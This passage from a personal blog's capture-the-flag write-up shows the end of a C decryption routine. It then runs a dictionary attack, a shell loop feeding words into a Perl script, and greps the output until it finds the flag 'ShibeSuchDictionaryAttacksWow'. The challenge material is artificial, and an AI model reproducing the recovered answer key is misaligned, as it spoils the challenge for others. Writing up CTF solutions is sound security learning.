        *file ^= (int)(((temp * (temp ^ 1)) >> 8) & 0xff);
        ROTOR(*(file++));
        decrypted++;
    }

    sv_setpvn( str, data, decrypted ); /* modify the passed SV with decrypt */
}

Applying dictionary attack:

$ while read line ; do echo $line ; echo $line | perl fish.pl  ; done < /usr/share/dict/american-english-small

Grabbing the key, with a little bit of guess-work

[Wani@Linux brute]$ cd out; strings *   | grep -i ctf
GCTf
$BgcTf
CTfJ
ctFe
OcTF
                                                        very much ctf
-CTF
>cTF
NCtf
[Wani@Linux out]$ grep "very much ctf" *
parliament:                                                        very much ctf
[Wani@Linux out]$  cat parliament
After:
The key is: ShibeSuchDictionaryAttacksWow



                                  wow

                                                        very much ctf

                                                                      most key




                            such flag


                                         so much shellcode





                                                        wow

[Wani@Linux out]$

Nehal J. Wani's Blog